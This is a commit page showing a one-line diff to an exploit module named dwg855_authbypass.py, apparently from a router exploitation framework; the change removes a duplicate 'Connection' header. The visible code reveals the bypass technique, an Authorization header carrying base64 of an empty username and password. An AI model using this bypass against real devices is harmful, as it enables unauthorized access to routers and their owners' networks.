Commit f9afc4c8 by 0BuRner Committed by GitHub

Update dwg855_authbypass.py

parent ccfa2dcb
......@@ -65,8 +65,7 @@ class Exploit(exploits.Exploit):
'Connection': 'keep-alive',
'Accept-Encoding': 'gzip, deflate',
'Authorization': 'Og==', # this is base64(":")
'Cache-Control': 'no-cache',
'Connection': 'close'}
'Cache-Control': 'no-cache'}
response = http_request(method="GET", url=url, headers=headers)
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment